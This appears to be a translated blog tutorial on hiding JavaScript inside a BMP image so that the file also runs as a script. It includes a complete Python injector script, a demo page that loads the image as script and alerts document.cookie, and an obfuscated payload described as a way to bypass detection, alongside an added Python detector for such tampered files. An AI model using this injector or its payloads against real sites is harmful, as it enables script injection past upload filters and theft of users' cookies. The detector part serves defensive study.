JS code embedded in an image can also be executed, which is quite interesting.
Script that performs the JS injection
Principle
1. Replace the third and fourth bytes of the original BMP file with \x2F\x2A, which corresponds to the JS comment opener /*
(Bytes three to six of a BMP file hold the BMP file size.)
2. Append the following to the end of the BMP file:
(1) \xFF
(2) \x2A\x2F, which corresponds to the JS comment closer */
(3) \x3D\x31\x3B, which corresponds to =1; the file still has to pass as BMP format, and the leading "BM" is then read by the JS engine as the statement BM=1;
(4) the JS code to inject
#!/usr/bin/env python2.7
import argparse

# JS comment opener written over bytes 2-3 of the file (the low bytes of the
# BMP size field), and the trailer appended after the pixel data: \xFF, the
# comment closer */, and "=1;" so the leading "BM" parses as the statement BM=1;
COMMENT_OPEN = b'\x2F\x2A'
TRAILER = b'\xFF\x2A\x2F\x3D\x31\x3B'

def injectFile(payload, fname):
    # overwrite the two bytes at offset 2 in place
    f = open(fname, "r+b")
    f.seek(2, 0)
    f.write(COMMENT_OPEN)
    f.close()
    # append the trailer and the JS payload
    f = open(fname, "a+b")
    f.write(TRAILER)
    f.write(payload.encode("latin-1"))
    f.close()
    return True

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", dest="filename", required=True,
                        help="the bmp file to be infected")
    parser.add_argument("js_payload",
                        help="the payload to be injected. For example: \"alert(1);\"")
    args = parser.parse_args()
    injectFile(args.js_payload, args.filename)
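As an added defensive check (not part of the original post or its script), the following Python 3 code builds a constructed minimal BMP, applies the same header and trailer edits described above to produce a test sample, and flags the tell-tale signs: a size field that reads `/*`, a declared size that disagrees with the file length, and a `*/` sequence after the pixel data. All function names are my own.

```python
import struct

BMP_HEADER_LEN = 54  # 14-byte file header + 40-byte BITMAPINFOHEADER

def build_bmp(width=2, height=2):
    """Constructed minimal 24-bit all-black BMP; a test sample, not a real image."""
    stride = (width * 3 + 3) & ~3            # pixel rows are padded to 4-byte multiples
    pixels = b'\x00' * (stride * height)
    size = BMP_HEADER_LEN + len(pixels)
    file_hdr = b'BM' + struct.pack('<IHHI', size, 0, 0, BMP_HEADER_LEN)
    dib_hdr = struct.pack('<IiiHHIIiiII', 40, width, height, 1, 24, 0,
                          len(pixels), 2835, 2835, 0, 0)
    return file_hdr + dib_hdr + pixels

def inject_like_page(bmp, payload):
    """Reproduce the page's transformation in memory to build a tampered sample."""
    return bmp[:2] + b'/*' + bmp[4:] + b'\xff*/=1;' + payload

def check_bmp(data):
    """Return a list of findings; an empty list means the file looks like a plain BMP."""
    findings = []
    if len(data) < BMP_HEADER_LEN or data[:2] != b'BM':
        return ['not a BMP file']
    declared = struct.unpack_from('<I', data, 2)[0]
    if data[2:4] == b'/*':
        findings.append('size field overwritten with JS comment opener /*')
    if declared != len(data):
        findings.append('declared size %d differs from actual %d' % (declared, len(data)))
    # compute where the pixel data should end from the DIB header fields
    width, height = struct.unpack_from('<ii', data, 18)
    bpp = struct.unpack_from('<H', data, 28)[0]
    stride = ((width * bpp + 31) // 32) * 4
    expected_end = struct.unpack_from('<I', data, 10)[0] + stride * abs(height)
    trailer = data[expected_end:]
    if b'*/' in trailer:
        findings.append('JS comment closer */ in %d trailing bytes' % len(trailer))
    return findings

if __name__ == '__main__':
    clean = build_bmp()
    print(check_bmp(clean))
    print(check_bmp(inject_like_page(clean, b'alert(1);')))
```

Running the file prints an empty list for the clean sample and three findings for the tampered one; `check_bmp` can be run over any BMP read from disk with `open(path, 'rb').read()`.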
Demo
The following demonstrates the actual effect.
Run the script to write the specified JS code into the given BMP image.
Format: python script_name -i target_BMP_image JSPayload
python BMPinjector.py -i 1.bmp "alert(document.cookie);"
Demo page run.html
<html> <head><title>Opening an image</title></head> <body> <img src="1.bmp"> <script src="1.bmp"></script> </body> </html>
Visit http://xxx/run.html
The JS can also be obfuscated to bypass detection; the result is the same.
python BMPinjector.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"
Note: \x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65 corresponds to document.cookie
Reference
http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html